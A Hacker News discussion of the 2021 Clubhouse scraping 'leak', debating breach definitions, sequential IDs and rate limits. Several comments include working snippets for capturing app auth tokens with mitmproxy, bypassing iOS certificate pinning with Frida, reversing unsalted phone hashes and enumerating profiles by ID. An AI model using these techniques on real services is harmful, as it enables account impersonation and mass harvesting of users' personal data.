Clubhouse data leak: 1.3M user records leaked online for free (cybernews.com)
306 points by 0xmohit on April 11, 2021 | 82 comments



I reported this to Clubhouse in February, no response whatsoever (I am not involved in this leak, just to be extra clear). Essentially anyone with the token from the iOS app (mitmproxy + SSL Kill Switch) can query their way through the entire public user profile database (the records are cleaned). It supports wildcard queries and just responds with some 20M records you can page through if you have the time. It luckily (!) doesn't expose e-mail addresses or phone numbers, which is why I also agree with others here that this is only mildly interesting. The news won't care, however. I think at around 4M users or so they switched from auto-incrementing IDs to a better numbering format; all records before that point remain as-is (incrementing).
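Grabbing the token is the only non-trivial step. As a sketch, a minimal mitmproxy addon that logs it; the header name and host check here are assumptions, not Clubhouse specifics:

    # token_sniffer.py -- run as: mitmproxy -s token_sniffer.py
    # Sketch only: assumes the app sends its token in an Authorization
    # header; the exact header the app uses may differ.
    from mitmproxy import http

    def request(flow: http.HTTPFlow) -> None:
        token = flow.request.headers.get("Authorization")
        if token and "clubhouse" in flow.request.pretty_host:
            print(f"Captured token for {flow.request.pretty_host}: {token}")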

I think Clubhouse can fix this quite easily (limit the records returned in search!!!) and apply some harsher rate limits on a per-token basis (tokens never expire, that's another thing).

I think they relied a bit too much on certificate pinning. Once that's bypassed, it's relatively easy to query your way through the data. If you manage to grab someone else's token (which doesn't expire), you can impersonate them (without logging the other session out) and show up/talk in rooms via the Agora SDK as that person.

They also upload the phone numbers from your address book in clear text (non-hashed), although I can see there's not much point in hashing: if the hashes aren't salted, the phone number space is small enough to reverse them by brute force.
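To illustrate why unsalted hashing wouldn't help much here: a rough sketch, assuming plain SHA-256 over 10-digit numbers, which can be reversed by simple enumeration.

    import hashlib

    def reverse_phone_hash(target_hash: str, area_code: str = "555") -> str | None:
        # Enumerate all 10^7 line numbers within one area code; at a few
        # million hashes per second this takes seconds on a laptop.
        for line in range(10_000_000):
            candidate = f"{area_code}{line:07d}"
            if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
                return candidate
        return None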


I was in some of those CH convos with you. I was actually suspended for a little while and tried clearing it up with them. I sent all the details I had and the original Google Doc I published with a lot of stypr's work. They never responded, but I was unbanned and given some fresh invites... but yeah... strange it hasn't been cleared up.

Ultimately I think the premise is a completely open and transparent digital experience. Clubhouse still needs to defend against those with malicious intent and a new realm of psychographics to abuse.

Side note: I was hooked on the app until that suspension (lasted ~2w)... I haven't been able to get back into a groove. I rarely log on anymore.


Reading your post, it's amazing how many checkboxes of failed access control it ticks:

* trying to control clients

* obfuscating IDs

* rate limiting data

...rather than the more boring yet standard approach of thinking through an access control policy and then enforcing that at the server.


> Once that's bypassed

Do you mean that you trick the app into accepting a wrong cert? How does one do that, apart from decompilation?


Jailbreaking an iPhone and using a tool like SSL Kill Switch [1] or just plain old Frida with a script like [2] will do the job. Jailbreaking is the hard part, especially for an up-to-date iPhone; after that there are loads of guides you can follow that disable certificate validation for pretty much every application. It all boils down to hooking the necessary validation functions and having the APIs lie to the app code.

Some apps package their own crypto helpers (often with big crypto problems) to make this harder and require actual reverse engineering, but those are a pain to maintain and it's only a matter of time before someone finds a way around them. If you can extract the symbols (i.e., if the app has not been obfuscated well), you can use Frida's API to hook those as well from any language you like. There's even an interactive JavaScript console you can attach to the apps you're hooking!
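As a rough sketch of what that hooking looks like through Frida's Python bindings: the JavaScript payload below swaps the certificate-verification callback the app hands to BoringSSL for one that always reports success (the process name is an assumption, and the real script in [2] is more thorough):

    import frida

    # Injected into the target process: intercept SSL_set_custom_verify and
    # replace the app's verify callback with one that always returns 0 (OK).
    JS = """
    var setVerify = Module.findExportByName(null, "SSL_set_custom_verify");
    var alwaysOk = new NativeCallback(function (ssl, outAlert) {
        return 0;  // ssl_verify_ok
    }, "int", ["pointer", "pointer"]);
    Interceptor.attach(setVerify, {
        onEnter: function (args) {
            args[2] = alwaysOk;  // args: (ssl, mode, callback)
        }
    });
    """

    device = frida.get_usb_device()
    session = device.attach("Clubhouse")  # process name is an assumption
    script = session.create_script(JS)
    script.load()
    input("Pinning bypass active; press Enter to detach...")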

Certificate pinning is a great way to protect users' security and privacy, especially in countries with questionable governments or ISPs, but it won't protect your app's secrets.

[1]: https://github.com/nabla-c0d3/ssl-kill-switch2

[2]: https://techblog.mediaservice.net/2020/08/ios-13-certificate...


That's exactly right. The hardest part is finding a phone that runs iOS 13+ and can still be jailbroken. I think I used an iPhone 7 or 8. If someone's really curious, it's probably even worth the $50-$100 for a used iPhone that can be jailbroken; it opens up A LOT of similar doors for investigation.


FWIW, the iPhone 12 I bought 2 weeks ago came with 14.2.1 (which has 2 jailbreaks available for it, unc0ver and Taurine).

Not sure if older iPhones would come with older versions too, I assume used ones would normally be up to date - though iPhone X and earlier are jailbreakable on all versions via checkm8


You can jailbreak any non-A14 device running 14.2.1 or lower right now by following this guide to update to 14.3 and then jailbreaking with unc0ver:

https://www.reddit.com/r/jailbreak/comments/mm0g3f/news_new_...

Jailbreaking iOS 14 with checkra1n breaks Face ID because it requires an additional sepOS exploit:

https://checkra.in/news/2020/09/iOS-14-announcement


> Some apps package their own crypto helpers

I didn't even know that mobile OSes have APIs for cert validation, since that's not part of the OS in my book. Though the motivation for shared libs is understandable (Facebook being an example of what not to do).

I guess one drunken evening I'm gonna read through the lists of APIs just to see what kind of stuff is crammed in there.


I'm not sure why you're surprised; Windows has come with a library for certificate validation since the late '90s. The OS X documentation library has an example of using SecureTransport all the way back in 2004, but the API is probably older. The *nix systems, with their modular nature, may be technically usable without a TLS library, but even your average RTOS comes with fully-featured TLS support built in these days.

Mobile operating systems provide a very broad API so that access management and sandboxing are made easy. I'm not sure how things are done on the iOS side, but on Android you can enable certificate pinning application-wide just by putting an XML file with the right name in the right place and adding a key/value pair for the hostname and the pinned public key (anywhere in the validation chain, AFAIK). The same XML file also allows disabling plain-text requests from your application runtime, preventing accidental data leaks to insecure networks.

Because adding security is so easy, there are loads of apps enforcing a security setting that would otherwise be considered obscure to most application developers. Exposing an optional, application-wide API is a pretty solid idea in my book; I'm not aware of any Linux system API that can easily enforce certificate pinning on an application-wide level.


On iOS you can use the Charles app and intercept HTTPS requests without any extra device.

https://www.charlesproxy.com/documentation/ios/


My understanding is that Charles (a man-in-the-middle proxy) will only work with apps that don't use certificate pinning. If an app uses that, I'm not aware of a way around it without jailbreaking.

https://www.raywenderlich.com/1484288-preventing-man-in-the-...


You usually recompile the app, or, if you have a jailbroken phone, you can do it at runtime.

But considering how the API is documented now (and alternative third party apps exist), it might not even be necessary.


Nothing wrong with auto-incrementing identifiers if actual security controls (authorization) are implemented for already-authenticated users.


Sequential IDs are still bad if you don't want to disclose the size of your customer base or other commercially sensitive information.

Also see the German Tank Problem[1].

1. https://en.m.wikipedia.org/wiki/German_tank_problem
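Concretely: register a handful of accounts, note the sequential IDs you're issued, and the standard minimum-variance estimator gives a decent guess at the total user count. A sketch with made-up IDs:

    def estimate_population(observed_ids: list[int]) -> float:
        # German tank estimator: N ~= m * (1 + 1/k) - 1, where m is the
        # largest ID observed and k is the number of samples.
        m, k = max(observed_ids), len(observed_ids)
        return m * (1 + 1 / k) - 1

    # Five hypothetical signups, highest ID seen 4,018,500:
    print(estimate_population([3_997_210, 4_002_133, 4_009_874, 4_015_001, 4_018_500]))
    # -> 4822199.0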


Am aware. Still don’t think it’s worth the hassle for most situations. Can leak information, but context is really important. I have rarely seen it be an issue over many years of app assessments. Just something to keep in the threat model for when it’s relevant.


There was one wireless ISP many years ago in a city I lived in that had a signal/reception page to see your signal to their closest tower. The URL included the customer number to identify your location. I quickly discovered it had no authorisation checks. You could easily find the exact addresses of all of their customers. Inactive/old customers returned no data.


What hassle is it? Where in your codebase do you assume sequentiality? It should be a one-line change in your DB config to generate GUIDs instead of sequential IDs. You have to do it eventually anyway, since sequentiality can't be assumed once you shard.
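For instance, with SQLAlchemy on Postgres the switch really is about one line on the model (a sketch, not Clubhouse's actual schema):

    import uuid
    from sqlalchemy import Column, String
    from sqlalchemy.dialects.postgresql import UUID
    from sqlalchemy.orm import declarative_base

    Base = declarative_base()

    class User(Base):
        __tablename__ = "users"
        # Instead of: id = Column(Integer, primary_key=True, autoincrement=True)
        id = Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
        username = Column(String, unique=True)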


Depends on the needs, I suppose. I don't like starting off with GUIDs until it's proven they are needed because, as you say, it's a simple change. Sharding does complicate the picture, but how many apps really need sharding?


> I don’t like starting off with GUIDs until it’s proven they are needed

For security incidents, "when they are needed" will be too late to do anything. If it's all the same to you, I'd advise that you default to GUIDs.


True, but if you use one sequential series for both users and free trials, the information leakage can be close to zero. Think about it as if all those AOL CDs were sequentially numbered.


That's not zero information leakage. That's just leaking another statistic that is somewhat correlated with the one you want to hide (you're leaking the production volume of trial AOL CDs, and that has some correlation to the number of new users).


Don’t return indexes with user queries.


Usually you need some external unique identifier so you can interact with the object. Sure, that doesn't have to be the DB index, but it is the convenient choice.


Except when you want to change databases, or grow beyond a single one, or shard what you have. If you do this you’re binding your future self.


If you follow the "defense in depth" paradigm, then sequential identifiers are bad when the other controls are defeated. Sequential IDs make it trivial to crawl the entire dataset, which could be the difference between "information on 4 million users was stolen" and "information on 4 users was stolen".


From [0]:

> This is misleading and false. Clubhouse has not been breached or hacked. The data referred to is all public profile information from our app, which anyone can access via the app or our API.

So it's just like what happened to Parler and LinkedIn: a so-called "data breach" of public data via scraping.

But last time I checked the private API in a GitHub repo, Clubhouse was using integer IDs for its users, not random alphanumeric strings.

This can essentially be scraped with a while loop, incrementing all the way to whoever signed up last (sketch below).

Did Clubhouse even implement rate limiting to combat this?

[0] https://twitter.com/joinClubhouse/status/1381066324105854977
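The enumeration described above needs nothing more sophisticated than a loop. A sketch with a placeholder endpoint and header (the real private API obviously differs):

    import time
    import requests

    BASE = "https://api.example.invalid/profiles"  # placeholder, not the real API
    HEADERS = {"Authorization": "Token <captured-token>"}

    def scrape(start: int = 1, stop: int = 1_300_000):
        # Walk the integer ID space; without server-side rate limiting,
        # nothing stops this from covering the whole user base.
        for user_id in range(start, stop):
            r = requests.get(f"{BASE}/{user_id}", headers=HEADERS, timeout=10)
            if r.status_code == 200:
                yield r.json()
            time.sleep(0.1)  # be gentle; even this is optional without rate limits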


Does anyone remember the AT&T "hack"? Those two just used curl to get the e-mail addresses and ICC-IDs of AT&T iPad users, which were publicly accessible. [1] It was still labeled a hack and went through the brain-dead media that way. Instead of AT&T getting in trouble, Auernheimer got a 41-month sentence, and the judge also ordered him and Spitler to pay $73,000 in restitution.

[1] https://www.wired.com/2013/03/att-hacker-gets-3-years/


weev had a lot of friends come forward to defend his actions, but then he went full neo-Nazi in prison and all of that support disappeared.

He now runs admin for The Daily Stormer and somehow keeps popping up in the worst places; we can't seem to shake the guy.

Additionally, he didn't even do the legwork for the AT&T op, but he really wanted to take credit for it for cool hacker cred, and it came back to bite him. I keep company with several people involved in that ordeal.


If this wasn't a hack, would a SQL injection have been a hack? Where do you draw the line?

What if they had exploited the heartbleed bug, would that have been a hack?


I think this comes down to an oft-repeated discussion of what we (society) consider the "proper" securing of data.

If a company leaves data available in a manner that is accessible without using any kind of vulnerability, but rather allows the unintended (ab)use of a poorly implemented service, then that's not a "hack"; that's on the company, and they should be held accountable.

Personally, I think an SQL injection still falls under the above. Securing public endpoints against long-known and easily mitigated vulnerabilities is 100% the company's responsibility.

There is no "we couldn't have prevented this" bullshit defense in that case.


The company probably deserves punishment for negligence, but that should have zero impact on how we view the actions of the "hacker".

>If a company leaves data available in a manner that is accessible without using any kind of vulnerability, but rather allows the unintended (ab)use of a poorly implemented service, then that's not a "hack", that's on the company, and they should be held accountable.

Is it "theft" if you leave your keys in your car and I take it?


IMO the “car with keys inside” analogy is not great for poorly implemented infosec. The latter is both more benign (no physical property directly stolen) and at the same time worse (the scale means multitudes of people will become vulnerable to further attacks, identity theft, doxxing and so on, rather than just one person losing the means of movement). It’s just different qualitatively.

What should have impact on how we view the actions of a hacker is the context of said actions, not just the “hacking” part.

If the hacker exploited company’s infosec negligence to profit in some way (say, by selling the data), or irresponsibly disclosed the data or the vulnerability possibly causing harm to affected users, it is one thing.

Otherwise, the same sequence of hacker’s actions that exploits the vulnerability does not compare to stealing a car with keys inside—it is (another faulty analogy warning) more like looking at a car through some magical looking glass that highlights the keys left inside by the owner.


It certainly is... but now let's go talk to your insurance company and see how they feel about covering the loss.


It's only a problem if you think it's a problem for someone to trivially build a social graph of every person on your exclusive social network with lots of high-profile people.

So... it's a problem.


Not a great response on their part, since the article they reference in the tweet does not say that they have been breached or hacked, only that there's a limited dataset of users out there and that Techmeme reached out to Clubhouse to ask if they are aware of any breaches of their systems.

Pretty bad optics if the other stuff is true: incremental IDs, no rate limiting, tokens that don't expire.


Correct, and judging from someone else in this thread, it was even possible to use wildcard matching to get access to an entire list of users at once.


I understand why people are saying this is not a breach, and I tend to agree. I do think there are some basic measures you can put in place to make this kind of abuse harder.

The real problem is that most users don't understand, when they sign up for a service like Clubhouse, what information is public, how easy it is for bad actors to get access to that information, and how this information can be used to harm them later (phishing, identity theft, etc.).

Who should be educating the average non-technical user about the risks of agreeing to share their information publicly? And even if users knew, would it actually change anything?

Personally, I have hit the point where I have accepted that all my (and my family's) information is public, and for that reason, with people like my parents, I tend to focus on teaching them to avoid falling for phone scams and phishing.


I guess a leak requires private data to be exposed; this is just a collection of public data.


Is it public info who invited you to the Clubhouse app? If not, that would imply some kind of breach, since that info is part of the leak.


> Is it public info who invited you to the Clubhouse app?

Yes: that is public info. This is all no more a "leak" than the original service is a "leak" of itself.


Besides, the name, username, profile picture, etc. are publicly accessible via permalinks.

For example: https://www.joinclubhouse.com/@clubhouse


Everyone can see who invited you to Clubhouse at the bottom of the profile.


It's not only public, it's central to the whole concept. You can always walk up your tree to see who the original member in your line is.


I agree. This "hack" is the equivalent of any search engine indexing public Facebook or LinkedIn profiles.


Same as the recent FB and LinkedIn incidents: it's all scraped data. That doesn't mean collecting public data at scale isn't bad, though.


Which one are you referring to? The recent dump of millions of FB contacts contained phone numbers. It had my phone number, and that's not public.


Still just scraping. They iterated every phone number on the planet.

https://twitter.com/mikko/status/1379686946117668867


It's a fabulous resource; I've already used it to identify unknown numbers sending me messages on Signal.


Is now.


Yup, wrong tense used. :(


It looks like someone just scraped all of the public profiles.


It looks more like a SQL dump to me. The data doesn't seem to be too critical, however.


How so? It is exactly the data you see when you open any Clubhouse profile in the app.

Almost as if there were an endpoint /profiles/<id> that someone just scraped by iterating id 0..9999999999.


One of the first places I worked they had that.

For private data.

Guess their user ID and you could get someone's whole contact list, access their voicemail, or start a 30-person conference call that could dial out internationally, with calls billed to the affected user...

The entire top management had user IDs below 100...

I found the problem because on login all it set was a cookie with the userid, and so of course I tried changing it.

When I alerted my manager to the problem they put in place 'encryption' of said cookie.

It was base64 encoding.

They were shocked when I broke that too.

Writing this now it sounds invented, but it's not. To be fair this was more than 20 years ago, and a lot of developers did not yet have any understanding of security, so they at least had a shred of an excuse.

I left that company first chance I got.


> 'encryption' of said cookie... It was base64 encoding.

Made me chuckle.


I never figured out what thought process led them to consider base64 a security feature. I mean, I could tell just by looking at the cookie that it was base64, but I expected that meant they'd encrypted it and then base64-encoded the result. But no. It made me treat every bit of code I was handed with extreme caution.
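For anyone who hasn't had the pleasure, "breaking" that scheme is a one-liner (cookie value hypothetical):

    import base64

    cookie = "dXNlcmlkPTQy"                   # what the server set
    print(base64.b64decode(cookie).decode())  # -> userid=42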


If I were collecting a large amount of data, I would most likely store it in a database.


Active data yes, archived data goes into the warehouse.


Yup, this seems to be the case. I don't know how this could be characterized as a leak.


It's definitely a grey area. Clubhouse strongly encourages using real names on its platform. Real names can be considered personal information, and based on what others have mentioned here, Clubhouse seems to lack the security controls that could have limited this "leak".


Perhaps we need to add a term such as "harvesting", to better distinguish between hacks/leaks and mass aggregation of public profile data.


Looks like it's a scrape of public profile information from Clubhouse.

Also it reads more like an advertisement for the author's services.

I'd like to see a more credible source.


That someone wrote an iOS app with such a lame concept of security that anyone could dump the entire database (even if it's only "public" data) with a script is not surprising; most startups, and even big companies, don't give a crap about security. I've seen this way too often. If they're so cavalier about security in simple REST queries, imagine what lurks beneath, not yet discovered.


This data seems to have been public and free for a while... Here: https://www.kaggle.com/johntukey/clubhouse-dataset


The generated graph is interesting. I guess the people in the middle are early adopters and people with high numbers of followers, and the clusters on the outer edges are people catering to a niche audience. Those niche audiences then spawn their own microcosms.


As long as we are talking about “leaks”, someone at Clubhouse might want to look into being compliant with California’s Consumer Privacy Act:

https://twitter.com/wbm312/status/1360014416087945222?s=21


This is the cherry on top of their policy that requires real names. People never learn.


They also know your birthdate and phone number. The only thing they don’t know is the name of your first pet.


These things weren’t exposed via the API.


I'm completely done with centralized social media "apps." I'm not signing up for any more and other than HN I've stopped using all of them and recommended that my friends do the same (surprisingly, many have listened.)


I feel this validates their decision to only release on iOS first. On Android there would be even fewer barriers to this kind of scraping.


I think we're watching the implosion of the cloud. These leaks are not even illegal, yet they will lead to a lot of spam, a lot of phishing, and a lot of other clumsy actions by clumsy actors that will alienate users and make them more reluctant to hand over their information next time. At least, I hope we're past peak cloud and falling fast toward the norm of the internet the way it was meant to be: pseudonymous.


I don’t get it. This “leaked” information looks like something that would be displayed on a public website for each user. As far as I can see it’s just public information, like user names and avatars on e.g. stack overflow.


The difference is that it's all in one SQL dump that any kiddo can use to spam. Ease of use matters.


Do you think this additional spam will be noticeable on top of what is already there?


Phone/SMS spam is definitely more noticeable and actually hard to block.


2021, the year of leaks...


Not really. It seems like we have redefined what a leak is.


Hopefully this is a good omen for Julian


All of their devs must be too busy working on an Android app to fix these minor security bugs... :)


Why is this a leak? Looks like someone scraped the data any user has access to. If this is a leak, then the cybernews.com feed should be filled with LinkedIn/IG/FB/etc. leaks every minute.



